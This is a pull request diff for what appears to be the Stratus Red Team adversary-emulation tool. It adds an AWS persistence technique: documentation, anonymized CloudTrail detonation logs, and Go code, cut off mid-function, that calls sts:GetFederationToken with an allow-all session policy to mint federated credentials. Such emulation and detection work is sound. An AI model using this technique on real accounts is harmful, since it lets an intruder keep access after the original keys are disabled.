### PR TITLE
New attack technique: Persistence through federation

### DIFF
--- a/docs/attack-techniques/AWS/aws.persistence.sts-federation-token.md
+++ b/docs/attack-techniques/AWS/aws.persistence.sts-federation-token.md
@@ -1,8 +1,8 @@
 ---
-title: Generation of AWS temporary keys from IAM credentials
+title: Generate temporary AWS credentials using GetFederationToken
 ---
 
-# Generation of AWS temporary keys from IAM credentials
+# Generate temporary AWS credentials using GetFederationToken
 
 
  <span class="smallcaps w3-badge w3-blue w3-round w3-text-white" title="This attack technique can be detonated multiple times">idempotent</span> 
@@ -17,7 +17,7 @@ Platform: AWS
 ## Description
 
 
-Establishes persistence by generating new AWS temporary keys that remain functional even if the original IAM user is blocked.
+Establishes persistence by generating new AWS temporary credentials through <code>sts:GetFederationToken</code>. The resulting credentials remain functional even if the original access keys are disabled.
 
 <span style="font-variant: small-caps;">Warm-up</span>: 
 
@@ -25,11 +25,12 @@ Establishes persistence by generating new AWS temporary keys that remain functio
 
 <span style="font-variant: small-caps;">Detonation</span>: 
 
-- Use the access keys from the IAM user to request temporary security credentials via AWS STS.
-- Call the sts:GetCallerIdentity API to validate the usage of the new temporary credentials and ensure they are functional.
+- Use the access keys from the IAM user to request temporary security credentials via <code>sts:GetFederationToken</code>.
+- Call <code>sts:GetCallerIdentity</code> using these new credentials.
 
 References:
 
+- https://docs.aws.amazon.com/STS/latest/APIReference/API_GetFederationToken.html
 - https://www.crowdstrike.com/en-us/blog/how-adversaries-persist-with-aws-user-federation/
 - https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
 - https://fwdcloudsec.org/assets/presentations/2024/europe/sebastian-walla-cloud-conscious-tactics-techniques-and-procedures-an-overview.pdf
@@ -44,7 +45,7 @@ stratus detonate aws.persistence.sts-federation-token
 
 
 Through CloudTrail's <code>GetFederationToken</code> event.
-'
+
 
 
 ## Detonation logs <span class="smallcaps w3-badge w3-light-green w3-round w3-text-sand">new!</span>
@@ -59,53 +60,9 @@ The following CloudTrail events are generated when this technique is detonated[^
 
 ??? "View raw detonation logs"
 
-    ```json hl_lines="6 50"
+    ```json hl_lines="6 51"
 
     [
-	   {
-	      "awsRegion": "ap-isob-east-1r",
-	      "eventCategory": "Management",
-	      "eventID": "91529247-c4c4-4793-afc8-d70bbcfe9d19",
-	      "eventName": "GetCallerIdentity",
-	      "eventSource": "sts.amazonaws.com",
-	      "eventTime": "2024-11-30T08:43:18Z",
-	      "eventType": "AwsApiCall",
-	      "eventVersion": "1.08",
-	      "managementEvent": true,
-	      "readOnly": true,
-	      "recipientAccountId": "742491224508",
-	      "requestID": "037be419-9e9f-42e0-a38f-2a5d2ae1ce65",
-	      "requestParameters": null,
-	      "responseElements": null,
-	      "sourceIPAddress": "255.090.254.5",
-	      "tlsDetails": {
-	         "cipherSuite": "TLS_AES_128_GCM_SHA256",
-	         "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com",
-	         "tlsVersion": "TLSv1.3"
-	      },
-	      "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2",
-	      "userIdentity": {
-	         "accessKeyId": "ASIASTJKC5GCM7ZE6LUP",
-	         "accountId": "742491224508",
-	         "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team",
-	         "principalId": "742491224508:stratus_red_team",
-	         "sessionContext": {
-	            "attributes": {
-	               "creationDate": "2024-11-30T08:43:17Z",
-	               "mfaAuthenticated": "false"
-	            },
-	            "sessionIssuer": {
-	               "accountId": "742491224508",
-	               "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user",
-	               "principalId": "AIDAN7SEM6PEVTNQR8M4",
-	               "type": "IAMUser",
-	               "userName": "stratus-red-team-user-federation-user"
-	            },
-	            "webIdFederationData": {}
-	         },
-	         "type": "FederatedUser"
-	      }
-	   },
 	   {
 	      "awsRegion": "ap-isob-east-1r",
 	      "eventCategory": "Management",
@@ -149,6 +106,50 @@ The following CloudTrail events are generated when this technique is detonated[^
 	         "principalId": "AIDAN7SEM6PEVTNQR8M4",
 	         "type": "IAMUser",
 	         "userName": "stratus-red-team-user-federation-user"
+	      }
+	   },
+	   {
+	      "awsRegion": "ap-isob-east-1r",
+	      "eventCategory": "Management",
+	      "eventID": "91529247-c4c4-4793-afc8-d70bbcfe9d19",
+	      "eventName": "GetCallerIdentity",
+	      "eventSource": "sts.amazonaws.com",
+	      "eventTime": "2024-11-30T08:43:18Z",
+	      "eventType": "AwsApiCall",
+	      "eventVersion": "1.08",
+	      "managementEvent": true,
+	      "readOnly": true,
+	      "recipientAccountId": "742491224508",
+	      "requestID": "037be419-9e9f-42e0-a38f-2a5d2ae1ce65",
+	      "requestParameters": null,
+	      "responseElements": null,
+	      "sourceIPAddress": "255.090.254.5",
+	      "tlsDetails": {
+	         "cipherSuite": "TLS_AES_128_GCM_SHA256",
+	         "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com",
+	         "tlsVersion": "TLSv1.3"
+	      },
+	      "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2",
+	      "userIdentity": {
+	         "accessKeyId": "ASIASTJKC5GCM7ZE6LUP",
+	         "accountId": "742491224508",
+	         "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team",
+	         "principalId": "742491224508:stratus_red_team",
+	         "sessionContext": {
+	            "attributes": {
+	               "creationDate": "2024-11-30T08:43:17Z",
+	               "mfaAuthenticated": "false"
+	            },
+	            "sessionIssuer": {
+	               "accountId": "742491224508",
+	               "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user",
+	               "principalId": "AIDAN7SEM6PEVTNQR8M4",
+	               "type": "IAMUser",
+	               "userName": "stratus-red-team-user-federation-user"
+	            },
+	            "webIdFederationData": {}
+	         },
+	         "type": "FederatedUser"
 	      }
 	   }
 	]

--- a/docs/attack-techniques/AWS/aws.persistence.sts-federation-token.md
+++ b/docs/attack-techniques/AWS/aws.persistence.sts-federation-token.md
@@ -1,0 +1,157 @@
+---
+title: Generation of AWS temporary keys from IAM credentials
+---
+
+# Generation of AWS temporary keys from IAM credentials
+
+
+ <span class="smallcaps w3-badge w3-blue w3-round w3-text-white" title="This attack technique can be detonated multiple times">idempotent</span> 
+
+Platform: AWS
+
+## MITRE ATT&CK Tactics
+
+
+- Persistence
+
+## Description
+
+
+Establishes persistence by generating new AWS temporary keys that remain functional even if the original IAM user is blocked.
+
+<span style="font-variant: small-caps;">Warm-up</span>: 
+
+- Create an IAM user and generate a pair of access keys.
+
+<span style="font-variant: small-caps;">Detonation</span>: 
+
+- Use the access keys from the IAM user to request temporary security credentials via AWS STS.
+- Call the sts:GetCallerIdentity API to validate the usage of the new temporary credentials and ensure they are functional.
+
+References:
+
+- https://www.crowdstrike.com/en-us/blog/how-adversaries-persist-with-aws-user-federation/
+- https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+- https://fwdcloudsec.org/assets/presentations/2024/europe/sebastian-walla-cloud-conscious-tactics-techniques-and-procedures-an-overview.pdf
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate aws.persistence.sts-federation-token
+```
+## Detection
+
+
+Through CloudTrail's <code>GetFederationToken</code> event.
+'
+
+
+## Detonation logs <span class="smallcaps w3-badge w3-light-green w3-round w3-text-sand">new!</span>
+
+The following CloudTrail events are generated when this technique is detonated[^1]:
+
+
+- `sts:GetCallerIdentity`
+
+- `sts:GetFederationToken`
+
+
+??? "View raw detonation logs"
+
+    ```json hl_lines="6 50"
+
+    [
+	   {
+	      "awsRegion": "ap-isob-east-1r",
+	      "eventCategory": "Management",
+	      "eventID": "91529247-c4c4-4793-afc8-d70bbcfe9d19",
+	      "eventName": "GetCallerIdentity",
+	      "eventSource": "sts.amazonaws.com",
+	      "eventTime": "2024-11-30T08:43:18Z",
+	      "eventType": "AwsApiCall",
+	      "eventVersion": "1.08",
+	      "managementEvent": true,
+	      "readOnly": true,
+	      "recipientAccountId": "742491224508",
+	      "requestID": "037be419-9e9f-42e0-a38f-2a5d2ae1ce65",
+	      "requestParameters": null,
+	      "responseElements": null,
+	      "sourceIPAddress": "255.090.254.5",
+	      "tlsDetails": {
+	         "cipherSuite": "TLS_AES_128_GCM_SHA256",
+	         "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com",
+	         "tlsVersion": "TLSv1.3"
+	      },
+	      "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2",
+	      "userIdentity": {
+	         "accessKeyId": "ASIASTJKC5GCM7ZE6LUP",
+	         "accountId": "742491224508",
+	         "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team",
+	         "principalId": "742491224508:stratus_red_team",
+	         "sessionContext": {
+	            "attributes": {
+	               "creationDate": "2024-11-30T08:43:17Z",
+	               "mfaAuthenticated": "false"
+	            },
+	            "sessionIssuer": {
+	               "accountId": "742491224508",
+	               "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user",
+	               "principalId": "AIDAN7SEM6PEVTNQR8M4",
+	               "type": "IAMUser",
+	               "userName": "stratus-red-team-user-federation-user"
+	            },
+	            "webIdFederationData": {}
+	         },
+	         "type": "FederatedUser"
+	      }
+	   },
+	   {
+	      "awsRegion": "ap-isob-east-1r",
+	      "eventCategory": "Management",
+	      "eventID": "6e882b9d-2af8-4c67-b91f-aeac6a0e5e70",
+	      "eventName": "GetFederationToken",
+	      "eventSource": "sts.amazonaws.com",
+	      "eventTime": "2024-11-30T08:43:17Z",
+	      "eventType": "AwsApiCall",
+	      "eventVersion": "1.08",
+	      "managementEvent": true,
+	      "readOnly": false,
+	      "recipientAccountId": "742491224508",
+	      "requestID": "e2de7fd1-2a86-4837-b15a-96fff1388061",
+	      "requestParameters": {
+	         "name": "stratus_red_team",
+	         "policy": "{\n\t\t\"Version\": \"2012-10-17\",\n\t\t\"Statement\": [\n\t\t\t{\n\t\t\t\t\"Effect\": \"Allow\",\n\t\t\t\t\"Action\": \"*\",\n\t\t\t\t\"Resource\": \"*\"\n\t\t\t}\n\t\t]\n\t}"
+	      },
+	      "responseElements": {
+	         "credentials": {
+	            "accessKeyId": "ASIASTJKC5GCM7ZE6LUP",
+	            "expiration": "Nov 30, 2024, 8:43:17 PM",
+	            "sessionToken": "IQoJb3JpZ2luX2VjEOH//////////wEaCXVzLWVhc3QtMSJIMEYCIQDzpomGZAmkp4RIzBo4RqVJGEmUNjyA7lHyt1aKfFh8IwIhANX6aS3XpNU319gOolVjEBkNLRmu9dyO8FqoDW5y+HL4KqICCIr//////////wEQABoMMzQ1NTk0NjA3OTQ5IgykqzjqIZ5pQXZgeDEq9gGg9Law7M5zzj/fSvNlo2pgdgHCmA6UW8IevbwXiKbLO5y0dg/sdhsaEUaOvl6i2Fu+xF2p3dvI8SuCJSTH5PEC2ZRgX1TPhzh+0xN7CsCQG2diBitgDQSs+E3P9ED4xDVuTCE9H8IIS/2BuksBI9bQ3z2itKRkVmkC+xpsfyFc98vX0ZLSUKOIpx+iaDNrhiW85Cyt6ezNEyLfX3bukmmIdVIZQ+Tb4tYLvIRKIyp6OFiA3BL48K7nfIAd1EzDhGnlvkZN/70hDxYt8hTKehNXDs2FVKY5u96z0zhsnNGcuhHHa7OEOKg5lLL5QuEzjx6JA+e9qaQwpaCrugY6mAFp1LZ4E15PVqImPSC/wtr+rEU4Dnp+1/6+PNkbxvxYXfqZOfJxRkZtgWtmV7iWapGzA/pVedD4vuHci4Kq2NUTuyA8L7BeKSaEq0FqFi1yrfCYjYsGI3ncxMQQddgiXVXeoWY4c4auGvAHgiJI/PDQPsaa3Sle/gGnok53u8NfNYoBRtASGaJJtGS0ylDxsQVe9InwBxoJnQ=="
+	         },
+	         "federatedUser": {
+	            "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team",
+	            "federatedUserId": "742491224508:stratus_red_team"
+	         },
+	         "packedPolicySize": 4
+	      },
+	      "sourceIPAddress": "255.090.254.5",
+	      "tlsDetails": {
+	         "cipherSuite": "TLS_AES_128_GCM_SHA256",
+	         "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com",
+	         "tlsVersion": "TLSv1.3"
+	      },
+	      "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2",
+	      "userIdentity": {
+	         "accessKeyId": "AKIA6V1GNZTT65XQH36M",
+	         "accountId": "742491224508",
+	         "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user",
+	         "principalId": "AIDAN7SEM6PEVTNQR8M4",
+	         "type": "IAMUser",
+	         "userName": "stratus-red-team-user-federation-user"
+	      }
+	   }
+	]
+    ```
+
+[^1]: These logs have been gathered from a real detonation of this technique in a test environment using [Grimoire](https://github.com/DataDog/grimoire), and anonymized using [LogLicker](https://github.com/Permiso-io-tools/LogLicker).

--- a/docs/attack-techniques/AWS/index.md
+++ b/docs/attack-techniques/AWS/index.md
@@ -110,7 +110,7 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 
 - [Create an IAM Roles Anywhere trust anchor](./aws.persistence.rolesanywhere-create-trust-anchor.md)
 
-- [Generation of AWS temporary keys from IAM credentials](./aws.persistence.sts-federation-token.md)
+- [Generate temporary AWS credentials using GetFederationToken](./aws.persistence.sts-federation-token.md)
 
 
 ## Privilege Escalation

--- a/docs/attack-techniques/AWS/index.md
+++ b/docs/attack-techniques/AWS/index.md
@@ -110,6 +110,8 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 
 - [Create an IAM Roles Anywhere trust anchor](./aws.persistence.rolesanywhere-create-trust-anchor.md)
 
+- [Generation of AWS temporary keys from IAM credentials](./aws.persistence.sts-federation-token.md)
+
 
 ## Privilege Escalation
 

--- a/docs/attack-techniques/list.md
+++ b/docs/attack-techniques/list.md
@@ -49,6 +49,7 @@ This page contains the list of all Stratus Attack Techniques.
 | [Add a Malicious Lambda Extension](./AWS/aws.persistence.lambda-layer-extension.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
 | [Overwrite Lambda Function Code](./AWS/aws.persistence.lambda-overwrite-code.md) | [AWS](./AWS/index.md) | Persistence |
 | [Create an IAM Roles Anywhere trust anchor](./AWS/aws.persistence.rolesanywhere-create-trust-anchor.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
+| [Generation of AWS temporary keys from IAM credentials](./AWS/aws.persistence.sts-federation-token.md) | [AWS](./AWS/index.md) | Persistence |
 | [Change IAM user password](./AWS/aws.privilege-escalation.iam-update-user-login-profile.md) | [AWS](./AWS/index.md) | Privilege Escalation |
 | [Execute Command on Virtual Machine using Custom Script Extension](./azure/azure.execution.vm-custom-script-extension.md) | [Azure](./azure/index.md) | Execution |
 | [Execute Commands on Virtual Machine using Run Command](./azure/azure.execution.vm-run-command.md) | [Azure](./azure/index.md) | Execution |

--- a/docs/attack-techniques/list.md
+++ b/docs/attack-techniques/list.md
@@ -49,7 +49,7 @@ This page contains the list of all Stratus Attack Techniques.
 | [Add a Malicious Lambda Extension](./AWS/aws.persistence.lambda-layer-extension.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
 | [Overwrite Lambda Function Code](./AWS/aws.persistence.lambda-overwrite-code.md) | [AWS](./AWS/index.md) | Persistence |
 | [Create an IAM Roles Anywhere trust anchor](./AWS/aws.persistence.rolesanywhere-create-trust-anchor.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
-| [Generation of AWS temporary keys from IAM credentials](./AWS/aws.persistence.sts-federation-token.md) | [AWS](./AWS/index.md) | Persistence |
+| [Generate temporary AWS credentials using GetFederationToken](./AWS/aws.persistence.sts-federation-token.md) | [AWS](./AWS/index.md) | Persistence |
 | [Change IAM user password](./AWS/aws.privilege-escalation.iam-update-user-login-profile.md) | [AWS](./AWS/index.md) | Privilege Escalation |
 | [Execute Command on Virtual Machine using Custom Script Extension](./azure/azure.execution.vm-custom-script-extension.md) | [Azure](./azure/index.md) | Execution |
 | [Execute Commands on Virtual Machine using Run Command](./azure/azure.execution.vm-run-command.md) | [Azure](./azure/index.md) | Execution |

--- a/docs/detonation-logs/aws.persistence.sts-federation-token.json
+++ b/docs/detonation-logs/aws.persistence.sts-federation-token.json
@@ -2,50 +2,6 @@
    {
       "awsRegion": "ap-isob-east-1r",
       "eventCategory": "Management",
-      "eventID": "91529247-c4c4-4793-afc8-d70bbcfe9d19",
-      "eventName": "GetCallerIdentity",
-      "eventSource": "sts.amazonaws.com",
-      "eventTime": "2024-11-30T08:43:18Z",
-      "eventType": "AwsApiCall",
-      "eventVersion": "1.08",
-      "managementEvent": true,
-      "readOnly": true,
-      "recipientAccountId": "742491224508",
-      "requestID": "037be419-9e9f-42e0-a38f-2a5d2ae1ce65",
-      "requestParameters": null,
-      "responseElements": null,
-      "sourceIPAddress": "255.090.254.5",
-      "tlsDetails": {
-         "cipherSuite": "TLS_AES_128_GCM_SHA256",
-         "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com",
-         "tlsVersion": "TLSv1.3"
-      },
-      "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2",
-      "userIdentity": {
-         "accessKeyId": "ASIASTJKC5GCM7ZE6LUP",
-         "accountId": "742491224508",
-         "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team",
-         "principalId": "742491224508:stratus_red_team",
-         "sessionContext": {
-            "attributes": {
-               "creationDate": "2024-11-30T08:43:17Z",
-               "mfaAuthenticated": "false"
-            },
-            "sessionIssuer": {
-               "accountId": "742491224508",
-               "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user",
-               "principalId": "AIDAN7SEM6PEVTNQR8M4",
-               "type": "IAMUser",
-               "userName": "stratus-red-team-user-federation-user"
-            },
-            "webIdFederationData": {}
-         },
-         "type": "FederatedUser"
-      }
-   },
-   {
-      "awsRegion": "ap-isob-east-1r",
-      "eventCategory": "Management",
       "eventID": "6e882b9d-2af8-4c67-b91f-aeac6a0e5e70",
       "eventName": "GetFederationToken",
       "eventSource": "sts.amazonaws.com",
@@ -86,6 +42,50 @@
          "principalId": "AIDAN7SEM6PEVTNQR8M4",
          "type": "IAMUser",
          "userName": "stratus-red-team-user-federation-user"
+      }
+   },
+   {
+      "awsRegion": "ap-isob-east-1r",
+      "eventCategory": "Management",
+      "eventID": "91529247-c4c4-4793-afc8-d70bbcfe9d19",
+      "eventName": "GetCallerIdentity",
+      "eventSource": "sts.amazonaws.com",
+      "eventTime": "2024-11-30T08:43:18Z",
+      "eventType": "AwsApiCall",
+      "eventVersion": "1.08",
+      "managementEvent": true,
+      "readOnly": true,
+      "recipientAccountId": "742491224508",
+      "requestID": "037be419-9e9f-42e0-a38f-2a5d2ae1ce65",
+      "requestParameters": null,
+      "responseElements": null,
+      "sourceIPAddress": "255.090.254.5",
+      "tlsDetails": {
+         "cipherSuite": "TLS_AES_128_GCM_SHA256",
+         "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com",
+         "tlsVersion": "TLSv1.3"
+      },
+      "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2",
+      "userIdentity": {
+         "accessKeyId": "ASIASTJKC5GCM7ZE6LUP",
+         "accountId": "742491224508",
+         "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team",
+         "principalId": "742491224508:stratus_red_team",
+         "sessionContext": {
+            "attributes": {
+               "creationDate": "2024-11-30T08:43:17Z",
+               "mfaAuthenticated": "false"
+            },
+            "sessionIssuer": {
+               "accountId": "742491224508",
+               "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user",
+               "principalId": "AIDAN7SEM6PEVTNQR8M4",
+               "type": "IAMUser",
+               "userName": "stratus-red-team-user-federation-user"
+            },
+            "webIdFederationData": {}
+         },
+         "type": "FederatedUser"
       }
    }
 ]

--- a/docs/detonation-logs/aws.persistence.sts-federation-token.json
+++ b/docs/detonation-logs/aws.persistence.sts-federation-token.json
@@ -1,0 +1,91 @@
+[
+   {
+      "awsRegion": "ap-isob-east-1r",
+      "eventCategory": "Management",
+      "eventID": "91529247-c4c4-4793-afc8-d70bbcfe9d19",
+      "eventName": "GetCallerIdentity",
+      "eventSource": "sts.amazonaws.com",
+      "eventTime": "2024-11-30T08:43:18Z",
+      "eventType": "AwsApiCall",
+      "eventVersion": "1.08",
+      "managementEvent": true,
+      "readOnly": true,
+      "recipientAccountId": "742491224508",
+      "requestID": "037be419-9e9f-42e0-a38f-2a5d2ae1ce65",
+      "requestParameters": null,
+      "responseElements": null,
+      "sourceIPAddress": "255.090.254.5",
+      "tlsDetails": {
+         "cipherSuite": "TLS_AES_128_GCM_SHA256",
+         "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com",
+         "tlsVersion": "TLSv1.3"
+      },
+      "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2",
+      "userIdentity": {
+         "accessKeyId": "ASIASTJKC5GCM7ZE6LUP",
+         "accountId": "742491224508",
+         "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team",
+         "principalId": "742491224508:stratus_red_team",
+         "sessionContext": {
+            "attributes": {
+               "creationDate": "2024-11-30T08:43:17Z",
+               "mfaAuthenticated": "false"
+            },
+            "sessionIssuer": {
+               "accountId": "742491224508",
+               "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user",
+               "principalId": "AIDAN7SEM6PEVTNQR8M4",
+               "type": "IAMUser",
+               "userName": "stratus-red-team-user-federation-user"
+            },
+            "webIdFederationData": {}
+         },
+         "type": "FederatedUser"
+      }
+   },
+   {
+      "awsRegion": "ap-isob-east-1r",
+      "eventCategory": "Management",
+      "eventID": "6e882b9d-2af8-4c67-b91f-aeac6a0e5e70",
+      "eventName": "GetFederationToken",
+      "eventSource": "sts.amazonaws.com",
+      "eventTime": "2024-11-30T08:43:17Z",
+      "eventType": "AwsApiCall",
+      "eventVersion": "1.08",
+      "managementEvent": true,
+      "readOnly": false,
+      "recipientAccountId": "742491224508",
+      "requestID": "e2de7fd1-2a86-4837-b15a-96fff1388061",
+      "requestParameters": {
+         "name": "stratus_red_team",
+         "policy": "{\n\t\t\"Version\": \"2012-10-17\",\n\t\t\"Statement\": [\n\t\t\t{\n\t\t\t\t\"Effect\": \"Allow\",\n\t\t\t\t\"Action\": \"*\",\n\t\t\t\t\"Resource\": \"*\"\n\t\t\t}\n\t\t]\n\t}"
+      },
+      "responseElements": {
+         "credentials": {
+            "accessKeyId": "ASIASTJKC5GCM7ZE6LUP",
+            "expiration": "Nov 30, 2024, 8:43:17 PM",
+            "sessionToken": "IQoJb3JpZ2luX2VjEOH//////////wEaCXVzLWVhc3QtMSJIMEYCIQDzpomGZAmkp4RIzBo4RqVJGEmUNjyA7lHyt1aKfFh8IwIhANX6aS3XpNU319gOolVjEBkNLRmu9dyO8FqoDW5y+HL4KqICCIr//////////wEQABoMMzQ1NTk0NjA3OTQ5IgykqzjqIZ5pQXZgeDEq9gGg9Law7M5zzj/fSvNlo2pgdgHCmA6UW8IevbwXiKbLO5y0dg/sdhsaEUaOvl6i2Fu+xF2p3dvI8SuCJSTH5PEC2ZRgX1TPhzh+0xN7CsCQG2diBitgDQSs+E3P9ED4xDVuTCE9H8IIS/2BuksBI9bQ3z2itKRkVmkC+xpsfyFc98vX0ZLSUKOIpx+iaDNrhiW85Cyt6ezNEyLfX3bukmmIdVIZQ+Tb4tYLvIRKIyp6OFiA3BL48K7nfIAd1EzDhGnlvkZN/70hDxYt8hTKehNXDs2FVKY5u96z0zhsnNGcuhHHa7OEOKg5lLL5QuEzjx6JA+e9qaQwpaCrugY6mAFp1LZ4E15PVqImPSC/wtr+rEU4Dnp+1/6+PNkbxvxYXfqZOfJxRkZtgWtmV7iWapGzA/pVedD4vuHci4Kq2NUTuyA8L7BeKSaEq0FqFi1yrfCYjYsGI3ncxMQQddgiXVXeoWY4c4auGvAHgiJI/PDQPsaa3Sle/gGnok53u8NfNYoBRtASGaJJtGS0ylDxsQVe9InwBxoJnQ=="
+         },
+         "federatedUser": {
+            "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team",
+            "federatedUserId": "742491224508:stratus_red_team"
+         },
+         "packedPolicySize": 4
+      },
+      "sourceIPAddress": "255.090.254.5",
+      "tlsDetails": {
+         "cipherSuite": "TLS_AES_128_GCM_SHA256",
+         "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com",
+         "tlsVersion": "TLSv1.3"
+      },
+      "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2",
+      "userIdentity": {
+         "accessKeyId": "AKIA6V1GNZTT65XQH36M",
+         "accountId": "742491224508",
+         "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user",
+         "principalId": "AIDAN7SEM6PEVTNQR8M4",
+         "type": "IAMUser",
+         "userName": "stratus-red-team-user-federation-user"
+      }
+   }
+]

--- a/docs/index.yaml
+++ b/docs/index.yaml
@@ -295,7 +295,7 @@ AWS:
           platform: AWS
           isIdempotent: false
         - id: aws.persistence.sts-federation-token
-          name: Generation of AWS temporary keys from IAM credentials
+          name: Generate temporary AWS credentials using GetFederationToken
           isSlow: false
           mitreAttackTactics:
             - Persistence

--- a/docs/index.yaml
+++ b/docs/index.yaml
@@ -294,6 +294,13 @@ AWS:
             - Privilege Escalation
           platform: AWS
           isIdempotent: false
+        - id: aws.persistence.sts-federation-token
+          name: Generation of AWS temporary keys from IAM credentials
+          isSlow: false
+          mitreAttackTactics:
+            - Persistence
+          platform: AWS
+          isIdempotent: true
     Privilege Escalation:
         - id: aws.execution.ec2-user-data
           name: Execute Commands on EC2 Instance via User Data

--- a/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.go
+++ b/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.go
@@ -1,0 +1,119 @@
+package aws
+
+import (
+	"context"
+	_ "embed"
+	"errors"
+	"github.com/aws/aws-sdk-go-v2/aws"
+	"github.com/aws/aws-sdk-go-v2/credentials"
+	"github.com/aws/aws-sdk-go-v2/config"
+	"github.com/aws/aws-sdk-go-v2/service/sts"
+	"github.com/datadog/stratus-red-team/v2/pkg/stratus"
+	"github.com/datadog/stratus-red-team/v2/pkg/stratus/mitreattack"
+	"log"
+
+)
+
+//go:embed main.tf
+var tf []byte
+
+func init() {
+	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
+		ID:           "aws.persistence.sts-federation-token",
+		FriendlyName: "Generation of AWS temporary keys from IAM credentials",
+		Description: `
+Establishes persistence by generating new AWS temporary keys that remain functional even if the original IAM user is blocked.
+
+Warm-up: 
+
+- Create an IAM user and generate a pair of access keys.
+
+Detonation: 
+
+- Use the access keys from the IAM user to request temporary security credentials via AWS STS.
+- Call the sts:GetCallerIdentity API to validate the usage of the new temporary credentials and ensure they are functional.
+
+References:
+
+- https://www.crowdstrike.com/en-us/blog/how-adversaries-persist-with-aws-user-federation/
+- https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+- https://fwdcloudsec.org/assets/presentations/2024/europe/sebastian-walla-cloud-conscious-tactics-techniques-and-procedures-an-overview.pdf
+`,
+		Detection: `
+Through CloudTrail's <code>GetFederationToken</code> event.
+'`,
+		Platform: stratus.AWS,
+
+		IsIdempotent:               true,
+		MitreAttackTactics:         []mitreattack.Tactic{mitreattack.Persistence},
+		PrerequisitesTerraformCode: tf,
+		Detonate:                   detonate,
+	})
+}
+
+func detonate(params map[string]string, providers stratus.CloudProviders) error {
+	accessKeyID := params["access_key_id"]
+	secretAccessKey := params["secret_access_key"]
+
+	if accessKeyID == "" || secretAccessKey == "" {
+		log.Println("Error: Missing required access key ID or secret access key")
+		return nil
+	}
+
+	awsConfig, err := config.LoadDefaultConfig(context.Background(),
+		config.WithCredentialsProvider(
+			credentials.NewStaticCredentialsProvider(accessKeyID, secretAccessKey, ""),
+		),
+	)
+	if err != nil {
+		return errors.New("Error loading AWS configuration: " + err.Error())
+	}
+
+	stsClient := sts.NewFromConfig(awsConfig)
+
+	federatedUserName := "stratus_red_team"
+	sessionPolicy := `{
+		"Version": "2012-10-17",
+		"Statement": [
+			{
+				"Effect": "Allow",
+				"Action": "*",
+				"Resource": "*"
+			}
+		]
+	}`
+
+	log.Println("Calling GetFederationToken to obtain temporary credentials")
+	getFederationTokenInput := &sts.GetFederationTokenInput{
+		Name:   &federatedUserName,
+		Policy: &sessionPolicy,
+	}
+
+	federationTokenResult, err := stsClient.GetFederationToken(context.Background(), getFederationTokenInput)
+	if err != nil {
